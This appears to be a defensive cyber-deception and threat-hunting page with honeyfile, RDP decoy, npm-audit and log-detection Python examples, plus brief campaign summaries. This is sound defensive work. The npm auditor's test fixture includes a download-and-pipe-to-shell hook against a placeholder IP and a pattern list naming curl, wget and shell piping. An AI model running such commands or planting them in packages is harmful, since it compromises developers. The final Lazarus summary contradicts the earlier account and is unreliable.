Deceptive Data Channels

Goal: Redirect attacker exfiltration attempts to controlled channels or disrupt their operations.

Approach: Creating fake data channels that appear to be valuable exfiltration routes.

Set up fake network channels, storage devices, or cloud services that look like ideal routes for data exfiltration, and steer attacker traffic towards them. Because no legitimate workflow uses these channels, anything that arrives on them can be captured and analysed to learn the attacker's methods, or the channel itself can be used to disrupt the operation.

Honeyfiles with Deceptive Content

Goal: Identify attackers attempting to exfiltrate data and gather information about their targets.

Approach: Creating and monitoring honeyfiles with enticing but fake data.

Plant “honeyfiles” – files that appear to hold sensitive information – in locations where attackers are likely to search for valuable data. The files hold only fabricated content, can carry embedded tracking mechanisms (such as a unique canary token that identifies which decoy leaked), and can be wired to raise an alert as soon as they are opened or copied.
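As an added example (not code from the original page), the script below plants decoy files with fabricated contents, embeds a unique canary token in each, and then detects two things: a decoy being modified or removed on disk, and a token turning up somewhere it should not be, such as a captured upload body. The file names, the contents, the `HF-` token prefix and the captured stream are all constructed for this example.

```python
"""Honeyfiles with canary tokens: plant decoys, verify their integrity, and
spot a decoy's token inside any other data (an exfiltration stream, a paste).

Added example, not from the original page. Decoy names and contents are
fabricated; the 'HF-' token prefix is an assumption chosen so that one regular
expression matches every token this script issues.
"""
import hashlib
import os
import re
import secrets
import tempfile

# Constructed decoy templates: plausible file names, entirely fake contents.
DECOY_TEMPLATES = {
    "passwords.txt": "vpn.corp.example  jsmith  Winter2024!\nroot@db01  {token}\n",
    "aws_keys.csv": "profile,access_key,secret\nbackup,{token},{token}\n",
    "board_minutes_Q3.txt": "CONFIDENTIAL - Q3 board minutes\nDocument ref: {token}\n",
}
TOKEN_RE = re.compile(r"HF-[0-9a-f]{16}")


def _new_token():
    # 64 bits of randomness: unguessable, and it never occurs in real data.
    return "HF-" + secrets.token_hex(8)


def plant_honeyfiles(root, templates=DECOY_TEMPLATES):
    """Write one decoy per template under `root`; return {token: {path, sha256}}."""
    os.makedirs(root, exist_ok=True)
    manifest = {}
    for name, template in templates.items():
        token = _new_token()
        content = template.format(token=token)
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        manifest[token] = {
            "path": path,
            "sha256": hashlib.sha256(content.encode("utf-8")).hexdigest(),
        }
    return manifest


def check_integrity(manifest):
    """Report each decoy as intact, modified or missing; the manifest is the truth."""
    status = {}
    for meta in manifest.values():
        path = meta["path"]
        if not os.path.exists(path):
            status[path] = "missing"
            continue
        with open(path, "rb") as fh:
            digest = hashlib.sha256(fh.read()).hexdigest()
        status[path] = "intact" if digest == meta["sha256"] else "modified"
    return status


def find_leaked_decoys(blob, manifest):
    """Return the decoy paths whose canary token appears in `blob` (str or bytes)."""
    if isinstance(blob, bytes):
        blob = blob.decode("utf-8", "replace")
    hits = {manifest[t]["path"] for t in TOKEN_RE.findall(blob) if t in manifest}
    return sorted(hits)


def demo():
    """Plant decoys in a temp dir, simulate exfiltration and tampering, return results."""
    root = tempfile.mkdtemp(prefix="honey-")
    manifest = plant_honeyfiles(root)
    pw_path = os.path.join(root, "passwords.txt")
    # Constructed: a captured HTTP upload body that embeds one decoy verbatim.
    with open(pw_path, encoding="utf-8") as fh:
        captured = "POST /upload HTTP/1.1\r\n\r\n" + fh.read() + "\r\n--end--"
    leaked = [os.path.basename(p) for p in find_leaked_decoys(captured, manifest)]
    # Simulate an attacker editing one decoy and deleting another.
    with open(os.path.join(root, "aws_keys.csv"), "a", encoding="utf-8") as fh:
        fh.write("tampered\n")
    os.remove(os.path.join(root, "board_minutes_Q3.txt"))
    integrity = {os.path.basename(p): s for p, s in check_integrity(manifest).items()}
    return {"planted": len(manifest), "leaked": leaked, "integrity": integrity}


if __name__ == "__main__":
    print(demo())
```

The manifest must live somewhere the attacker cannot reach (a SIEM, a detection repository), since it maps tokens back to decoys. In practice the `find_leaked_decoys` check runs over DLP captures, proxy logs or public-paste monitoring, and `check_integrity` runs on a schedule alongside OS-level file access auditing, which is what actually tells you *who* opened the file.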

Threat Hunting Report: CyberVolk

The CyberVolk group is actively developing and deploying ransomware, potentially targeting organizations based on geopolitical motivations.

CyberVolk | A Deep Dive into the Hacktivists, Tools and Ransomware Fueling Pro-Russian Cyber Attacks

T1566 – CyberVolk has been observed utilizing phishing emails and LinkedIn messages to distribute malicious links to targets.

T1490 – The ransomware terminates processes associated with Microsoft Management Console (MMC) or Task Manager.

T1486 – The ransomware displays a payment screen with a decryption timer and payment details, including BTC and USDT options. The ransom amount is set to $1000.00, and the timer is set to 5 hours.

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure

T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.

T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.

T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.

T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.

T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.

T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.
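The chain above hinges on one step: `npm install` runs whatever lifecycle scripts the package declares, before the developer has read a line of its code. As an added example (not code from the original page or from the campaign it describes), the audit below parses a `package.json`, pulls out the hooks npm executes automatically, and flags commands that run code from a hidden dot-directory, fetch content from the network, or pipe into a shell. The three manifests, the package names and the `203.0.113.10` address are constructed for this example.

```python
"""Audit an npm package.json for install-time lifecycle scripts before running
`npm install`.

Added example, not from the original page. The pattern list and the sample
manifests are constructed; the second manifest mirrors the pattern described
above (a lifecycle hook that runs a JavaScript file hidden in a dot-directory).
"""
import json
import re
import sys

# npm runs these hooks automatically during install, with the developer's
# privileges, before any of the package's code has been reviewed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "prepare", "preprepare", "postprepare")

SUSPICIOUS_PATTERNS = [
    (re.compile(r"(^|[\s/\\])\.[A-Za-z0-9_-]+[/\\]"), "runs code from a hidden dot-directory"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "fetches content from the network at install time"),
    (re.compile(r"\bnode\s+-e\b|\beval\b"), "evaluates inline code"),
    (re.compile(r"base64", re.I), "decodes a base64 payload"),
    (re.compile(r"\|\s*(sh|bash|powershell|pwsh)\b"), "pipes downloaded content into a shell"),
]

# Constructed sample manifests (names, versions and the IP are placeholders).
BENIGN_MANIFEST = (
    '{"name":"example-lib","version":"1.0.0",'
    '"scripts":{"test":"node test/run.js","build":"tsc -p ."}}'
)
HIDDEN_SCRIPT_MANIFEST = (
    '{"name":"example-project","version":"0.1.3",'
    '"scripts":{"postinstall":"node .vscode/test.js","test":"jest"}}'
)
DOWNLOADER_MANIFEST = (
    '{"name":"example-tool","version":"2.0.0",'
    '"scripts":{"preinstall":"curl -s http://203.0.113.10/setup.sh | sh"}}'
)


def audit_manifest(text):
    """Return findings (hook, command, severity, reason) for a package.json body."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts")
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(cmd)]
        if reasons:
            for why in reasons:
                findings.append({"hook": hook, "command": cmd, "severity": "warn", "reason": why})
        else:
            # Any install-time hook deserves a look, even if nothing matched.
            findings.append({"hook": hook, "command": cmd, "severity": "info",
                             "reason": "lifecycle hook present; review before installing"})
    return findings


def safe_to_install(text):
    """True when no lifecycle hook matched a suspicious pattern."""
    return all(f["severity"] != "warn" for f in audit_manifest(text))


if __name__ == "__main__":
    # Usage: python audit_npm.py path/to/package.json
    with open(sys.argv[1], encoding="utf-8") as fh:
        body = fh.read()
    for f in audit_manifest(body):
        print(f"[{f['severity']}] {f['hook']}: {f['command']}  <- {f['reason']}")
    sys.exit(0 if safe_to_install(body) else 1)
```

Run it against the unpacked tarball (`npm pack` then extract) rather than the repository copy, since the published manifest is what `npm install` executes. Setting `npm config set ignore-scripts true` (or passing `--ignore-scripts`) stops these hooks from running at all, which is a sensible default on developer workstations that handle unreviewed packages.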

Deceptive Local Administrator Passwords

Goal: Disrupt attacker attempts to exploit common local administrator passwords for lateral movement.

Approach: Deploying a diverse set of fake local administrator passwords across systems.

Seed systems with decoy local administrator credentials that differ from the real password and are valid nowhere. Attackers who harvest them through credential dumping, or who spray common local administrator passwords, waste time and tooling on credentials that never work, and because no legitimate process ever authenticates with a decoy, any logon attempt that uses one is a high-fidelity signal of lateral movement.

Fake RDP Honeypots

Goal: Lure attackers attempting to use RDP for lateral movement and gather information about their tools and techniques.

Approach: Deploying and monitoring fake RDP servers.

Set up decoy RDP servers that mimic legitimate systems and capture the credentials attackers present, record their session activity, or redirect them into a controlled environment. No legitimate user has a reason to connect to a decoy, so every connection attempt, including the very first packet before any authentication, is worth logging and investigating.
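Every RDP client opens with an X.224 Connection Request, and that first packet already carries a routing cookie with the username the client intends to use plus the security protocols it supports. As an added example (not code from the original page), the low-interaction decoy below parses that PDU according to the public MS-RDPBCGR layout and logs the source, the claimed username and the requested protocols. The listener, the sample packet builder and the usernames are constructed for this example.

```python
"""Low-interaction RDP decoy: parse the X.224 Connection Request that every
RDP client sends first and log who is knocking.

Added example, not from the original page. Wire layout per MS-RDPBCGR:
TPKT header (4 bytes), X.224 CR TPDU (7 fixed bytes), optional routing cookie
'Cookie: mstshash=<user>\\r\\n', optional RDP_NEG_REQ (8 bytes). The listener
and the packet builder are constructed for this example.
"""
import socket
import struct

# requestedProtocols bits from RDP_NEG_REQ.
PROTOCOL_FLAGS = {
    0x00000001: "TLS",
    0x00000002: "CredSSP",
    0x00000004: "RDSTLS",
    0x00000008: "CredSSP-EX",
}
COOKIE_PREFIX = b"Cookie: mstshash="


def parse_connection_request(data):
    """Return the cookie user, negotiation flags and requested protocols."""
    if len(data) < 11 or data[0] != 0x03:
        raise ValueError("not a TPKT-framed PDU")
    (tpkt_len,) = struct.unpack("!H", data[2:4])
    if tpkt_len != len(data):
        raise ValueError("TPKT length mismatch")
    li = data[4]                      # X.224 length indicator (bytes after itself)
    if data[5] != 0xE0:               # CR TPDU code
        raise ValueError("not an X.224 Connection Request")
    body = data[11:5 + li]            # after DST-REF, SRC-REF and class option
    info = {"user": None, "neg_flags": 0, "protocols": ["standard RDP security"]}
    if body.startswith(COOKIE_PREFIX):
        end = body.find(b"\r\n")
        if end < 0:
            raise ValueError("unterminated routing cookie")
        # mstsc sends at most the first 9 characters of the username here;
        # scanners and brute-forcers often send the full name or no cookie.
        info["user"] = body[len(COOKIE_PREFIX):end].decode("latin-1")
        body = body[end + 2:]
    if len(body) >= 8 and body[0] == 0x01:   # TYPE_RDP_NEG_REQ
        _, flags, length, protos = struct.unpack("<BBHI", body[:8])
        if length != 8:
            raise ValueError("malformed RDP_NEG_REQ")
        info["neg_flags"] = flags
        if protos:
            info["protocols"] = [n for bit, n in PROTOCOL_FLAGS.items() if protos & bit]
    return info


def build_connection_request(user, protocols=0x0000000B):
    """Construct a client-side request (default flags mimic a modern mstsc)."""
    cookie = COOKIE_PREFIX + user.encode("latin-1") + b"\r\n"
    neg = struct.pack("<BBHI", 0x01, 0x00, 8, protocols)
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + cookie + neg
    return struct.pack("!BBH", 3, 0, 4 + 1 + len(x224)) + bytes([len(x224)]) + x224


def serve(bind="0.0.0.0", port=3389, log=print):
    """Accept connections, log the first PDU, then drop the client."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen()
        while True:
            conn, peer = srv.accept()
            with conn:
                conn.settimeout(5)
                try:
                    info = parse_connection_request(conn.recv(1024))
                    log(f"RDP probe from {peer[0]}:{peer[1]} user={info['user']!r} "
                        f"protocols={info['protocols']}")
                except (ValueError, socket.timeout) as exc:
                    log(f"non-RDP or malformed probe from {peer[0]}:{peer[1]}: {exc}")


if __name__ == "__main__":
    print(parse_connection_request(build_connection_request("admin")))
```

A client that requests only standard RDP security, or sends no cookie at all, is rarely a human at a Windows desktop; that fingerprint alone separates scanners and brute-force tools from stray users. Capturing the password itself requires the decoy to terminate TLS and CredSSP, which is a larger undertaking; this listener stops at the point where an alert is already justified.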

Deceptive Network Shares

Goal: Detect attempts to access sensitive or restricted network shares.

Approach: Creating and monitoring fake network shares.

Create fake network shares with enticing names or permissions that appear to contain valuable data. Because the shares have no legitimate users, audit every access attempt (share connections and individual file reads) to identify the actor, where they came from, and what they were looking for.
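Both the decoy-credential and the decoy-share techniques above come down to the same detection: a name that must never appear in a logon or share-access event does appear. As an added example (not code from the original page), the script below runs that check over Windows Security events (4624/4625 for logons, 5140/5145 for share access) that a log forwarder has flattened to JSON. The decoy account names, share names, hostnames, addresses and event records are all constructed for this example.

```python
"""Detect use of decoy local administrator accounts and access to decoy
network shares in Windows Security events.

Added example, not from the original page. Decoy names and the event records
are constructed; field names follow the Windows Security log as a SIEM
forwarder typically emits them (EventID, TargetUserName, ShareName, ...).
"""
import json
from collections import Counter

# Constructed decoy inventory: accounts that exist only to be harvested and
# shares nobody has a legitimate reason to open. Windows logs shares as \\*\Name.
DECOY_ACCOUNTS = {"adm_backup", "localadmin_old"}
DECOY_SHARES = {r"\\*\HR_Payroll", r"\\*\Finance_Archive"}

LOGON_TYPE_NAMES = {2: "interactive", 3: "network", 10: "remote interactive (RDP)"}

# Constructed sample events, one JSON record per line.
SAMPLE_EVENTS = [
    r'{"EventID":4624,"Computer":"FS01","TargetUserName":"jsmith","IpAddress":"10.0.5.12","LogonType":3}',
    r'{"EventID":4625,"Computer":"FS01","TargetUserName":"adm_backup","IpAddress":"10.0.9.77","LogonType":3,"Status":"0xC000006D"}',
    r'{"EventID":4624,"Computer":"WS-HONEY01","TargetUserName":"ADM_BACKUP","IpAddress":"10.0.9.77","LogonType":10}',
    r'{"EventID":5145,"Computer":"FS01","SubjectUserName":"jsmith","IpAddress":"10.0.9.77","ShareName":"\\\\*\\Finance_Archive","RelativeTargetName":"2023\\salaries.xlsx","AccessMask":"0x1"}',
    r'{"EventID":5140,"Computer":"FS01","SubjectUserName":"jsmith","IpAddress":"10.0.5.12","ShareName":"\\\\*\\Public"}',
]


def parse_events(lines):
    """Parse JSON lines, skipping blank or damaged records instead of aborting."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def detect(events, decoy_accounts=DECOY_ACCOUNTS, decoy_shares=DECOY_SHARES):
    """Return alerts for any decoy account logon or decoy share access."""
    decoy_accounts = {a.lower() for a in decoy_accounts}   # account names are case-insensitive
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        src = ev.get("IpAddress", "-")
        if eid in (4624, 4625):
            user = str(ev.get("TargetUserName", "")).lower()
            if user in decoy_accounts:
                ltype = ev.get("LogonType")
                success = eid == 4624
                alerts.append({
                    "rule": "decoy-credential-use",
                    # A successful logon means the decoy was accepted somewhere it should not exist.
                    "severity": "critical" if success else "high",
                    "source": src, "host": ev.get("Computer"), "account": user,
                    "detail": f"{'successful' if success else 'failed'} "
                              f"{LOGON_TYPE_NAMES.get(ltype, ltype)} logon",
                })
        elif eid in (5140, 5145):
            share = ev.get("ShareName", "")
            if share in decoy_shares:
                target = f"{share}\\{ev.get('RelativeTargetName', '')}".rstrip("\\")
                alerts.append({
                    "rule": "decoy-share-access", "severity": "high",
                    "source": src, "host": ev.get("Computer"),
                    "account": ev.get("SubjectUserName"), "detail": target,
                })
    return alerts


def sources_by_alert_count(alerts):
    """Rank source addresses: the same host touching several decoys is the lateral mover."""
    return Counter(a["source"] for a in alerts)


def run_sample():
    return detect(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    found = run_sample()
    for a in found:
        print(f"[{a['severity']}] {a['rule']} from {a['source']} on {a['host']}: "
              f"{a['account']} {a['detail']}")
    print(sources_by_alert_count(found))
```

Event 5140 requires the "Audit File Share" policy and 5145 requires "Audit Detailed File Share", so confirm both are enabled on the file server hosting the decoys before relying on this. The sample also shows why the RDP decoy and the decoy credential reinforce each other: the successful type-10 logon with `adm_backup` on the honey workstation is the single highest-confidence event in the set.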

Lazarus Lure in Yacht club

The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.

China shopping for Black Friday Gains

SilkSpecter actors are targeting online shoppers during the Black Friday period with spearphishing emails containing malicious attachments. These attachments likely contain obfuscated malware designed to evade detection and exfiltrate sensitive information like credit card details.